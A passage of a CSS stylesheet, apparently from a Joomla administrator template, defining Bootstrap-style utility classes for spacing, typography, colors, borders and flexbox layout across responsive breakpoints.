  margin: 1rem !important;
}

.m-4 {
  margin: 1.5rem !important;
}

.m-5 {
  margin: 3rem !important;
}

.m-auto {
  margin: auto !important;
}

.mx-0 {
  margin-right: 0 !important;
  margin-left: 0 !important;
}

.mx-1 {
  margin-right: 0.25rem !important;
  margin-left: 0.25rem !important;
}

.mx-2 {
  margin-right: 0.5rem !important;
  margin-left: 0.5rem !important;
}

.mx-3 {
  margin-right: 1rem !important;
  margin-left: 1rem !important;
}

.mx-4 {
  margin-right: 1.5rem !important;
  margin-left: 1.5rem !important;
}

.mx-5 {
  margin-right: 3rem !important;
  margin-left: 3rem !important;
}

.mx-auto {
  margin-right: auto !important;
  margin-left: auto !important;
}

.my-0 {
  margin-top: 0 !important;
  margin-bottom: 0 !important;
}

.my-1 {
  margin-top: 0.25rem !important;
  margin-bottom: 0.25rem !important;
}

.my-2 {
  margin-top: 0.5rem !important;
  margin-bottom: 0.5rem !important;
}

.my-3 {
  margin-top: 1rem !important;
  margin-bottom: 1rem !important;
}

.my-4 {
  margin-top: 1.5rem !important;
  margin-bottom: 1.5rem !important;
}

.my-5 {
  margin-top: 3rem !important;
  margin-bottom: 3rem !important;
}

.my-auto {
  margin-top: auto !important;
  margin-bottom: auto !important;
}

.mt-0 {
  margin-top: 0 !important;
}

.mt-1 {
  margin-top: 0.25rem !important;
}

.mt-2 {
  margin-top: 0.5rem !important;
}

.mt-3 {
  margin-top: 1rem !important;
}

.mt-4 {
  margin-top: 1.5rem !important;
}

.mt-5 {
  margin-top: 3rem !important;
}

.mt-auto {
  margin-top: auto !important;
}

.me-0 {
  margin-right: 0 !important;
}

.me-1 {
  margin-right: 0.25rem !important;
}

.me-2 {
  margin-right: 0.5rem !important;
}

.me-3 {
  margin-right: 1rem !important;
}

.me-4 {
  margin-right: 1.5rem !important;
}

.me-5 {
  margin-right: 3rem !important;
}

.me-auto {
  margin-right: auto !important;
}

.mb-0 {
  margin-bottom: 0 !important;
}

.mb-1 {
  margin-bottom: 0.25rem !important;
}

.mb-2 {
  margin-bottom: 0.5rem !important;
}

.mb-3, .form-group {
  margin-bottom: 1rem !important;
}

.mb-4 {
  margin-bottom: 1.5rem !important;
}

.mb-5 {
  margin-bottom: 3rem !important;
}

.mb-auto {
  margin-bottom: auto !important;
}

.ms-0 {
  margin-left: 0 !important;
}

.ms-1 {
  margin-left: 0.25rem !important;
}

.ms-2 {
  margin-left: 0.5rem !important;
}

.ms-3 {
  margin-left: 1rem !important;
}

.ms-4 {
  margin-left: 1.5rem !important;
}

.ms-5 {
  margin-left: 3rem !important;
}

.ms-auto {
  margin-left: auto !important;
}

.p-0 {
  padding: 0 !important;
}

.p-1 {
  padding: 0.25rem !important;
}

.p-2 {
  padding: 0.5rem !important;
}

.p-3 {
  padding: 1rem !important;
}

.p-4 {
  padding: 1.5rem !important;
}

.p-5 {
  padding: 3rem !important;
}

.px-0 {
  padding-right: 0 !important;
  padding-left: 0 !important;
}

.px-1 {
  padding-right: 0.25rem !important;
  padding-left: 0.25rem !important;
}

.px-2 {
  padding-right: 0.5rem !important;
  padding-left: 0.5rem !important;
}

.px-3 {
  padding-right: 1rem !important;
  padding-left: 1rem !important;
}

.px-4 {
  padding-right: 1.5rem !important;
  padding-left: 1.5rem !important;
}

.px-5 {
  padding-right: 3rem !important;
  padding-left: 3rem !important;
}

.py-0 {
  padding-top: 0 !important;
  padding-bottom: 0 !important;
}

.py-1 {
  padding-top: 0.25rem !important;
  padding-bottom: 0.25rem !important;
}

.py-2 {
  padding-top: 0.5rem !important;
  padding-bottom: 0.5rem !important;
}

.py-3 {
  padding-top: 1rem !important;
  padding-bottom: 1rem !important;
}

.py-4 {
  padding-top: 1.5rem !important;
  padding-bottom: 1.5rem !important;
}

.py-5 {
  padding-top: 3rem !important;
  padding-bottom: 3rem !important;
}

.pt-0 {
  padding-top: 0 !important;
}

.pt-1 {
  padding-top: 0.25rem !important;
}

.pt-2 {
  padding-top: 0.5rem !important;
}

.pt-3 {
  padding-top: 1rem !important;
}

.pt-4 {
  padding-top: 1.5rem !important;
}

.pt-5 {
  padding-top: 3rem !important;
}

.pe-0 {
  padding-right: 0 !important;
}

.pe-1 {
  padding-right: 0.25rem !important;
}

.pe-2 {
  padding-right: 0.5rem !important;
}

.pe-3 {
  padding-right: 1rem !important;
}

.pe-4 {
  padding-right: 1.5rem !important;
}

.pe-5 {
  padding-right: 3rem !important;
}

.pb-0 {
  padding-bottom: 0 !important;
}

.pb-1 {
  padding-bottom: 0.25rem !important;
}

.pb-2 {
  padding-bottom: 0.5rem !important;
}

.pb-3 {
  padding-bottom: 1rem !important;
}

.pb-4 {
  padding-bottom: 1.5rem !important;
}

.pb-5 {
  padding-bottom: 3rem !important;
}

.ps-0 {
  padding-left: 0 !important;
}

.ps-1 {
  padding-left: 0.25rem !important;
}

.ps-2 {
  padding-left: 0.5rem !important;
}

.ps-3 {
  padding-left: 1rem !important;
}

.ps-4 {
  padding-left: 1.5rem !important;
}

.ps-5 {
  padding-left: 3rem !important;
}

.font-monospace {
  font-family: var(--font-monospace) !important;
}

.fs-1 {
  font-size: calc(1.29rem + 0.48vw) !important;
}

.fs-2 {
  font-size: calc(1.275rem + 0.3vw) !important;
}

.fs-3 {
  font-size: 1.25rem !important;
}

.fs-4 {
  font-size: 1rem !important;
}

.fs-5 {
  font-size: 0.9286rem !important;
}

.fs-6 {
  font-size: 0.8571rem !important;
}

.fst-italic {
  font-style: italic !important;
}

.fst-normal {
  font-style: normal !important;
}

.fw-light {
  font-weight: 300 !important;
}

.fw-lighter {
  font-weight: lighter !important;
}

.fw-normal {
  font-weight: 400 !important;
}

.fw-bold {
  font-weight: 700 !important;
}

.fw-bolder {
  font-weight: bolder !important;
}

.lh-1 {
  line-height: 1 !important;
}

.lh-sm {
  line-height: 1.25 !important;
}

.lh-base {
  line-height: 1.5 !important;
}

.lh-lg {
  line-height: 2 !important;
}

.text-start {
  text-align: left !important;
}

.text-end {
  text-align: right !important;
}

.text-center {
  text-align: center !important;
}

.text-decoration-none {
  text-decoration: none !important;
}

.text-decoration-underline {
  text-decoration: underline !important;
}

.text-decoration-line-through {
  text-decoration: line-through !important;
}

.text-lowercase {
  text-transform: lowercase !important;
}

.text-uppercase {
  text-transform: uppercase !important;
}

.text-capitalize {
  text-transform: capitalize !important;
}

.text-wrap {
  white-space: normal !important;
}

.text-nowrap {
  white-space: nowrap !important;
}

/* rtl:begin:remove */
.text-break {
  word-wrap: break-word !important;
  word-break: break-word !important;
}

/* rtl:end:remove */
.text-primary {
  color: #132f53 !important;
}

.text-secondary {
  color: #495057 !important;
}

.text-success {
  color: #457d54 !important;
}

.text-info {
  color: #2a69b8 !important;
}

.text-warning {
  color: #ffb514 !important;
}

.text-danger {
  color: #c52827 !important;
}

.text-light {
  color: #f8f9fa !important;
}

.text-dark {
  color: #212529 !important;
}

.text-atum-link-color {
  color: #2a69b8 !important;
}

.text-atum-text-dark {
  color: #495057 !important;
}

.text-action {
  color: #132f53 !important;
}

.text-error {
  color: #3b0d0c !important;
}

.text-alert-success {
  color: #0f2f21 !important;
}

.text-white {
  color: #fff !important;
}

.text-body {
  color: var(--template-text-dark) !important;
}

.text-muted {
  color: #666e76 !important;
}

.text-black-50 {
  color: rgba(0, 0, 0, 0.5) !important;
}

.text-white-50 {
  color: rgba(255, 255, 255, 0.5) !important;
}

.text-reset {
  color: inherit !important;
}

.bg-primary {
  background-color: #132f53 !important;
}

.bg-secondary {
  background-color: #495057 !important;
}

.bg-success {
  background-color: #457d54 !important;
}

.bg-info {
  background-color: #2a69b8 !important;
}

.bg-warning {
  background-color: #ffb514 !important;
}

.bg-danger {
  background-color: #c52827 !important;
}

.bg-light {
  background-color: #f8f9fa !important;
}

.bg-dark {
  background-color: #212529 !important;
}

.bg-atum-link-color {
  background-color: #2a69b8 !important;
}

.bg-atum-text-dark {
  background-color: #495057 !important;
}

.bg-action {
  background-color: #132f53 !important;
}

.bg-error {
  background-color: #3b0d0c !important;
}

.bg-alert-success {
  background-color: #0f2f21 !important;
}

.bg-body {
  background-color: #fff !important;
}

.bg-white {
  background-color: #fff !important;
}

.bg-transparent {
  background-color: transparent !important;
}

.bg-gradient {
  background-image: var(--gradient) !important;
}

.user-select-all {
  -webkit-user-select: all !important;
     -moz-user-select: all !important;
      -ms-user-select: all !important;
          user-select: all !important;
}

.user-select-auto {
  -webkit-user-select: auto !important;
     -moz-user-select: auto !important;
      -ms-user-select: auto !important;
          user-select: auto !important;
}

.user-select-none {
  -webkit-user-select: none !important;
     -moz-user-select: none !important;
      -ms-user-select: none !important;
          user-select: none !important;
}

.pe-none {
  pointer-events: none !important;
}

.pe-auto {
  pointer-events: auto !important;
}

.rounded {
  border-radius: 0.25rem !important;
}

.rounded-0 {
  border-radius: 0 !important;
}

.rounded-1 {
  border-radius: 0.2rem !important;
}

.rounded-2 {
  border-radius: 0.25rem !important;
}

.rounded-3 {
  border-radius: 0.3rem !important;
}

.rounded-circle {
  border-radius: 50% !important;
}

.rounded-pill {
  border-radius: 50rem !important;
}

.rounded-top {
  border-top-left-radius: 0.25rem !important;
  border-top-right-radius: 0.25rem !important;
}

.rounded-end {
  border-top-right-radius: 0.25rem !important;
  border-bottom-right-radius: 0.25rem !important;
}

.rounded-bottom {
  border-bottom-right-radius: 0.25rem !important;
  border-bottom-left-radius: 0.25rem !important;
}

.rounded-start {
  border-bottom-left-radius: 0.25rem !important;
  border-top-left-radius: 0.25rem !important;
}

.visible {
  visibility: visible !important;
}

.invisible {
  visibility: hidden !important;
}

@media (min-width: 576px) {
  .float-sm-start {
    float: left !important;
  }

  .float-sm-end {
    float: right !important;
  }

  .float-sm-none {
    float: none !important;
  }

  .d-sm-inline {
    display: inline !important;
  }

  .d-sm-inline-block {
    display: inline-block !important;
  }

  .d-sm-block {
    display: block !important;
  }

  .d-sm-grid {
    display: grid !important;
  }

  .d-sm-table {
    display: table !important;
  }

  .d-sm-table-row {
    display: table-row !important;
  }

  .d-sm-table-cell {
    display: table-cell !important;
  }

  .d-sm-flex {
    display: flex !important;
  }

  .d-sm-inline-flex {
    display: inline-flex !important;
  }

  .d-sm-none {
    display: none !important;
  }

  .flex-sm-fill {
    flex: 1 1 auto !important;
  }

  .flex-sm-row {
    flex-direction: row !important;
  }

  .flex-sm-column {
    flex-direction: column !important;
  }

  .flex-sm-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-sm-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-sm-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-sm-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-sm-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-sm-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-sm-wrap {
    flex-wrap: wrap !important;
  }

  .flex-sm-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-sm-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-sm-0 {
    gap: 0 !important;
  }

  .gap-sm-1 {
    gap: 0.25rem !important;
  }

  .gap-sm-2 {
    gap: 0.5rem !important;
  }

  .gap-sm-3 {
    gap: 1rem !important;
  }

  .gap-sm-4 {
    gap: 1.5rem !important;
  }

  .gap-sm-5 {
    gap: 3rem !important;
  }

  .justify-content-sm-start {
    justify-content: flex-start !important;
  }

  .justify-content-sm-end {
    justify-content: flex-end !important;
  }

  .justify-content-sm-center {
    justify-content: center !important;
  }

  .justify-content-sm-between {
    justify-content: space-between !important;
  }

  .justify-content-sm-around {
    justify-content: space-around !important;
  }

  .justify-content-sm-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-sm-start {
    align-items: flex-start !important;
  }

  .align-items-sm-end {
    align-items: flex-end !important;
  }

  .align-items-sm-center {
    align-items: center !important;
  }

  .align-items-sm-baseline {
    align-items: baseline !important;
  }

  .align-items-sm-stretch {
    align-items: stretch !important;
  }

  .align-content-sm-start {
    align-content: flex-start !important;
  }

  .align-content-sm-end {
    align-content: flex-end !important;
  }

  .align-content-sm-center {
    align-content: center !important;
  }

  .align-content-sm-between {
    align-content: space-between !important;
  }

  .align-content-sm-around {
    align-content: space-around !important;
  }

  .align-content-sm-stretch {
    align-content: stretch !important;
  }

  .align-self-sm-auto {
    align-self: auto !important;
  }

  .align-self-sm-start {
    align-self: flex-start !important;
  }

  .align-self-sm-end {
    align-self: flex-end !important;
  }

  .align-self-sm-center {
    align-self: center !important;
  }

  .align-self-sm-baseline {
    align-self: baseline !important;
  }

  .align-self-sm-stretch {
    align-self: stretch !important;
  }

  .order-sm-first {
    order: -1 !important;
  }

  .order-sm-0 {
    order: 0 !important;
  }

  .order-sm-1 {
    order: 1 !important;
  }

  .order-sm-2 {
    order: 2 !important;
  }

  .order-sm-3 {
    order: 3 !important;
  }

  .order-sm-4 {
    order: 4 !important;
  }

  .order-sm-5 {
    order: 5 !important;
  }

  .order-sm-last {
    order: 6 !important;
  }

  .m-sm-0 {
    margin: 0 !important;
  }

  .m-sm-1 {
    margin: 0.25rem !important;
  }

  .m-sm-2 {
    margin: 0.5rem !important;
  }

  .m-sm-3 {
    margin: 1rem !important;
  }

  .m-sm-4 {
    margin: 1.5rem !important;
  }

  .m-sm-5 {
    margin: 3rem !important;
  }

  .m-sm-auto {
    margin: auto !important;
  }

  .mx-sm-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-sm-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-sm-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-sm-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-sm-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-sm-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-sm-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-sm-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-sm-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-sm-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-sm-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-sm-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-sm-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-sm-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-sm-0 {
    margin-top: 0 !important;
  }

  .mt-sm-1 {
    margin-top: 0.25rem !important;
  }

  .mt-sm-2 {
    margin-top: 0.5rem !important;
  }

  .mt-sm-3 {
    margin-top: 1rem !important;
  }

  .mt-sm-4 {
    margin-top: 1.5rem !important;
  }

  .mt-sm-5 {
    margin-top: 3rem !important;
  }

  .mt-sm-auto {
    margin-top: auto !important;
  }

  .me-sm-0 {
    margin-right: 0 !important;
  }

  .me-sm-1 {
    margin-right: 0.25rem !important;
  }

  .me-sm-2 {
    margin-right: 0.5rem !important;
  }

  .me-sm-3 {
    margin-right: 1rem !important;
  }

  .me-sm-4 {
    margin-right: 1.5rem !important;
  }

  .me-sm-5 {
    margin-right: 3rem !important;
  }

  .me-sm-auto {
    margin-right: auto !important;
  }

  .mb-sm-0 {
    margin-bottom: 0 !important;
  }

  .mb-sm-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-sm-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-sm-3 {
    margin-bottom: 1rem !important;
  }

  .mb-sm-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-sm-5 {
    margin-bottom: 3rem !important;
  }

  .mb-sm-auto {
    margin-bottom: auto !important;
  }

  .ms-sm-0 {
    margin-left: 0 !important;
  }

  .ms-sm-1 {
    margin-left: 0.25rem !important;
  }

  .ms-sm-2 {
    margin-left: 0.5rem !important;
  }

  .ms-sm-3 {
    margin-left: 1rem !important;
  }

  .ms-sm-4 {
    margin-left: 1.5rem !important;
  }

  .ms-sm-5 {
    margin-left: 3rem !important;
  }

  .ms-sm-auto {
    margin-left: auto !important;
  }

  .p-sm-0 {
    padding: 0 !important;
  }

  .p-sm-1 {
    padding: 0.25rem !important;
  }

  .p-sm-2 {
    padding: 0.5rem !important;
  }

  .p-sm-3 {
    padding: 1rem !important;
  }

  .p-sm-4 {
    padding: 1.5rem !important;
  }

  .p-sm-5 {
    padding: 3rem !important;
  }

  .px-sm-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-sm-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-sm-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-sm-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-sm-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-sm-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-sm-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-sm-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-sm-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-sm-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-sm-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-sm-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-sm-0 {
    padding-top: 0 !important;
  }

  .pt-sm-1 {
    padding-top: 0.25rem !important;
  }

  .pt-sm-2 {
    padding-top: 0.5rem !important;
  }

  .pt-sm-3 {
    padding-top: 1rem !important;
  }

  .pt-sm-4 {
    padding-top: 1.5rem !important;
  }

  .pt-sm-5 {
    padding-top: 3rem !important;
  }

  .pe-sm-0 {
    padding-right: 0 !important;
  }

  .pe-sm-1 {
    padding-right: 0.25rem !important;
  }

  .pe-sm-2 {
    padding-right: 0.5rem !important;
  }

  .pe-sm-3 {
    padding-right: 1rem !important;
  }

  .pe-sm-4 {
    padding-right: 1.5rem !important;
  }

  .pe-sm-5 {
    padding-right: 3rem !important;
  }

  .pb-sm-0 {
    padding-bottom: 0 !important;
  }

  .pb-sm-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-sm-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-sm-3 {
    padding-bottom: 1rem !important;
  }

  .pb-sm-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-sm-5 {
    padding-bottom: 3rem !important;
  }

  .ps-sm-0 {
    padding-left: 0 !important;
  }

  .ps-sm-1 {
    padding-left: 0.25rem !important;
  }

  .ps-sm-2 {
    padding-left: 0.5rem !important;
  }

  .ps-sm-3 {
    padding-left: 1rem !important;
  }

  .ps-sm-4 {
    padding-left: 1.5rem !important;
  }

  .ps-sm-5 {
    padding-left: 3rem !important;
  }

  .text-sm-start {
    text-align: left !important;
  }

  .text-sm-end {
    text-align: right !important;
  }

  .text-sm-center {
    text-align: center !important;
  }
}
@media (min-width: 768px) {
  .float-md-start {
    float: left !important;
  }

  .float-md-end {
    float: right !important;
  }

  .float-md-none {
    float: none !important;
  }

  .d-md-inline {
    display: inline !important;
  }

  .d-md-inline-block {
    display: inline-block !important;
  }

  .d-md-block {
    display: block !important;
  }

  .d-md-grid {
    display: grid !important;
  }

  .d-md-table {
    display: table !important;
  }

  .d-md-table-row {
    display: table-row !important;
  }

  .d-md-table-cell {
    display: table-cell !important;
  }

  .d-md-flex {
    display: flex !important;
  }

  .d-md-inline-flex {
    display: inline-flex !important;
  }

  .d-md-none {
    display: none !important;
  }

  .flex-md-fill {
    flex: 1 1 auto !important;
  }

  .flex-md-row {
    flex-direction: row !important;
  }

  .flex-md-column {
    flex-direction: column !important;
  }

  .flex-md-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-md-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-md-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-md-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-md-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-md-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-md-wrap {
    flex-wrap: wrap !important;
  }

  .flex-md-nowrap {
    flex-wrap: nowrap !important;
  }

  .flex-md-wrap-reverse {
    flex-wrap: wrap-reverse !important;
  }

  .gap-md-0 {
    gap: 0 !important;
  }

  .gap-md-1 {
    gap: 0.25rem !important;
  }

  .gap-md-2 {
    gap: 0.5rem !important;
  }

  .gap-md-3 {
    gap: 1rem !important;
  }

  .gap-md-4 {
    gap: 1.5rem !important;
  }

  .gap-md-5 {
    gap: 3rem !important;
  }

  .justify-content-md-start {
    justify-content: flex-start !important;
  }

  .justify-content-md-end {
    justify-content: flex-end !important;
  }

  .justify-content-md-center {
    justify-content: center !important;
  }

  .justify-content-md-between {
    justify-content: space-between !important;
  }

  .justify-content-md-around {
    justify-content: space-around !important;
  }

  .justify-content-md-evenly {
    justify-content: space-evenly !important;
  }

  .align-items-md-start {
    align-items: flex-start !important;
  }

  .align-items-md-end {
    align-items: flex-end !important;
  }

  .align-items-md-center {
    align-items: center !important;
  }

  .align-items-md-baseline {
    align-items: baseline !important;
  }

  .align-items-md-stretch {
    align-items: stretch !important;
  }

  .align-content-md-start {
    align-content: flex-start !important;
  }

  .align-content-md-end {
    align-content: flex-end !important;
  }

  .align-content-md-center {
    align-content: center !important;
  }

  .align-content-md-between {
    align-content: space-between !important;
  }

  .align-content-md-around {
    align-content: space-around !important;
  }

  .align-content-md-stretch {
    align-content: stretch !important;
  }

  .align-self-md-auto {
    align-self: auto !important;
  }

  .align-self-md-start {
    align-self: flex-start !important;
  }

  .align-self-md-end {
    align-self: flex-end !important;
  }

  .align-self-md-center {
    align-self: center !important;
  }

  .align-self-md-baseline {
    align-self: baseline !important;
  }

  .align-self-md-stretch {
    align-self: stretch !important;
  }

  .order-md-first {
    order: -1 !important;
  }

  .order-md-0 {
    order: 0 !important;
  }

  .order-md-1 {
    order: 1 !important;
  }

  .order-md-2 {
    order: 2 !important;
  }

  .order-md-3 {
    order: 3 !important;
  }

  .order-md-4 {
    order: 4 !important;
  }

  .order-md-5 {
    order: 5 !important;
  }

  .order-md-last {
    order: 6 !important;
  }

  .m-md-0 {
    margin: 0 !important;
  }

  .m-md-1 {
    margin: 0.25rem !important;
  }

  .m-md-2 {
    margin: 0.5rem !important;
  }

  .m-md-3 {
    margin: 1rem !important;
  }

  .m-md-4 {
    margin: 1.5rem !important;
  }

  .m-md-5 {
    margin: 3rem !important;
  }

  .m-md-auto {
    margin: auto !important;
  }

  .mx-md-0 {
    margin-right: 0 !important;
    margin-left: 0 !important;
  }

  .mx-md-1 {
    margin-right: 0.25rem !important;
    margin-left: 0.25rem !important;
  }

  .mx-md-2 {
    margin-right: 0.5rem !important;
    margin-left: 0.5rem !important;
  }

  .mx-md-3 {
    margin-right: 1rem !important;
    margin-left: 1rem !important;
  }

  .mx-md-4 {
    margin-right: 1.5rem !important;
    margin-left: 1.5rem !important;
  }

  .mx-md-5 {
    margin-right: 3rem !important;
    margin-left: 3rem !important;
  }

  .mx-md-auto {
    margin-right: auto !important;
    margin-left: auto !important;
  }

  .my-md-0 {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
  }

  .my-md-1 {
    margin-top: 0.25rem !important;
    margin-bottom: 0.25rem !important;
  }

  .my-md-2 {
    margin-top: 0.5rem !important;
    margin-bottom: 0.5rem !important;
  }

  .my-md-3 {
    margin-top: 1rem !important;
    margin-bottom: 1rem !important;
  }

  .my-md-4 {
    margin-top: 1.5rem !important;
    margin-bottom: 1.5rem !important;
  }

  .my-md-5 {
    margin-top: 3rem !important;
    margin-bottom: 3rem !important;
  }

  .my-md-auto {
    margin-top: auto !important;
    margin-bottom: auto !important;
  }

  .mt-md-0 {
    margin-top: 0 !important;
  }

  .mt-md-1 {
    margin-top: 0.25rem !important;
  }

  .mt-md-2 {
    margin-top: 0.5rem !important;
  }

  .mt-md-3 {
    margin-top: 1rem !important;
  }

  .mt-md-4 {
    margin-top: 1.5rem !important;
  }

  .mt-md-5 {
    margin-top: 3rem !important;
  }

  .mt-md-auto {
    margin-top: auto !important;
  }

  .me-md-0 {
    margin-right: 0 !important;
  }

  .me-md-1 {
    margin-right: 0.25rem !important;
  }

  .me-md-2 {
    margin-right: 0.5rem !important;
  }

  .me-md-3 {
    margin-right: 1rem !important;
  }

  .me-md-4 {
    margin-right: 1.5rem !important;
  }

  .me-md-5 {
    margin-right: 3rem !important;
  }

  .me-md-auto {
    margin-right: auto !important;
  }

  .mb-md-0 {
    margin-bottom: 0 !important;
  }

  .mb-md-1 {
    margin-bottom: 0.25rem !important;
  }

  .mb-md-2 {
    margin-bottom: 0.5rem !important;
  }

  .mb-md-3 {
    margin-bottom: 1rem !important;
  }

  .mb-md-4 {
    margin-bottom: 1.5rem !important;
  }

  .mb-md-5 {
    margin-bottom: 3rem !important;
  }

  .mb-md-auto {
    margin-bottom: auto !important;
  }

  .ms-md-0 {
    margin-left: 0 !important;
  }

  .ms-md-1 {
    margin-left: 0.25rem !important;
  }

  .ms-md-2 {
    margin-left: 0.5rem !important;
  }

  .ms-md-3 {
    margin-left: 1rem !important;
  }

  .ms-md-4 {
    margin-left: 1.5rem !important;
  }

  .ms-md-5 {
    margin-left: 3rem !important;
  }

  .ms-md-auto {
    margin-left: auto !important;
  }

  .p-md-0 {
    padding: 0 !important;
  }

  .p-md-1 {
    padding: 0.25rem !important;
  }

  .p-md-2 {
    padding: 0.5rem !important;
  }

  .p-md-3 {
    padding: 1rem !important;
  }

  .p-md-4 {
    padding: 1.5rem !important;
  }

  .p-md-5 {
    padding: 3rem !important;
  }

  .px-md-0 {
    padding-right: 0 !important;
    padding-left: 0 !important;
  }

  .px-md-1 {
    padding-right: 0.25rem !important;
    padding-left: 0.25rem !important;
  }

  .px-md-2 {
    padding-right: 0.5rem !important;
    padding-left: 0.5rem !important;
  }

  .px-md-3 {
    padding-right: 1rem !important;
    padding-left: 1rem !important;
  }

  .px-md-4 {
    padding-right: 1.5rem !important;
    padding-left: 1.5rem !important;
  }

  .px-md-5 {
    padding-right: 3rem !important;
    padding-left: 3rem !important;
  }

  .py-md-0 {
    padding-top: 0 !important;
    padding-bottom: 0 !important;
  }

  .py-md-1 {
    padding-top: 0.25rem !important;
    padding-bottom: 0.25rem !important;
  }

  .py-md-2 {
    padding-top: 0.5rem !important;
    padding-bottom: 0.5rem !important;
  }

  .py-md-3 {
    padding-top: 1rem !important;
    padding-bottom: 1rem !important;
  }

  .py-md-4 {
    padding-top: 1.5rem !important;
    padding-bottom: 1.5rem !important;
  }

  .py-md-5 {
    padding-top: 3rem !important;
    padding-bottom: 3rem !important;
  }

  .pt-md-0 {
    padding-top: 0 !important;
  }

  .pt-md-1 {
    padding-top: 0.25rem !important;
  }

  .pt-md-2 {
    padding-top: 0.5rem !important;
  }

  .pt-md-3 {
    padding-top: 1rem !important;
  }

  .pt-md-4 {
    padding-top: 1.5rem !important;
  }

  .pt-md-5 {
    padding-top: 3rem !important;
  }

  .pe-md-0 {
    padding-right: 0 !important;
  }

  .pe-md-1 {
    padding-right: 0.25rem !important;
  }

  .pe-md-2 {
    padding-right: 0.5rem !important;
  }

  .pe-md-3 {
    padding-right: 1rem !important;
  }

  .pe-md-4 {
    padding-right: 1.5rem !important;
  }

  .pe-md-5 {
    padding-right: 3rem !important;
  }

  .pb-md-0 {
    padding-bottom: 0 !important;
  }

  .pb-md-1 {
    padding-bottom: 0.25rem !important;
  }

  .pb-md-2 {
    padding-bottom: 0.5rem !important;
  }

  .pb-md-3 {
    padding-bottom: 1rem !important;
  }

  .pb-md-4 {
    padding-bottom: 1.5rem !important;
  }

  .pb-md-5 {
    padding-bottom: 3rem !important;
  }

  .ps-md-0 {
    padding-left: 0 !important;
  }

  .ps-md-1 {
    padding-left: 0.25rem !important;
  }

  .ps-md-2 {
    padding-left: 0.5rem !important;
  }

  .ps-md-3 {
    padding-left: 1rem !important;
  }

  .ps-md-4 {
    padding-left: 1.5rem !important;
  }

  .ps-md-5 {
    padding-left: 3rem !important;
  }

  .text-md-start {
    text-align: left !important;
  }

  .text-md-end {
    text-align: right !important;
  }

  .text-md-center {
    text-align: center !important;
  }
}
@media (min-width: 992px) {
  .float-lg-start {
    float: left !important;
  }

  .float-lg-end {
    float: right !important;
  }

  .float-lg-none {
    float: none !important;
  }

  .d-lg-inline {
    display: inline !important;
  }

  .d-lg-inline-block {
    display: inline-block !important;
  }

  .d-lg-block {
    display: block !important;
  }

  .d-lg-grid {
    display: grid !important;
  }

  .d-lg-table {
    display: table !important;
  }

  .d-lg-table-row {
    display: table-row !important;
  }

  .d-lg-table-cell {
    display: table-cell !important;
  }

  .d-lg-flex {
    display: flex !important;
  }

  .d-lg-inline-flex {
    display: inline-flex !important;
  }

  .d-lg-none {
    display: none !important;
  }

  .flex-lg-fill {
    flex: 1 1 auto !important;
  }

  .flex-lg-row {
    flex-direction: row !important;
  }

  .flex-lg-column {
    flex-direction: column !important;
  }

  .flex-lg-row-reverse {
    flex-direction: row-reverse !important;
  }

  .flex-lg-column-reverse {
    flex-direction: column-reverse !important;
  }

  .flex-lg-grow-0 {
    flex-grow: 0 !important;
  }

  .flex-lg-grow-1 {
    flex-grow: 1 !important;
  }

  .flex-lg-shrink-0 {
    flex-shrink: 0 !important;
  }

  .flex-lg-shrink-1 {
    flex-shrink: 1 !important;
  }

  .flex-lg-wrap {
    flex-wrap: wrap !important;
  }

  .flex-lg-nowrap {
    flex-wrap: nowrap !important;
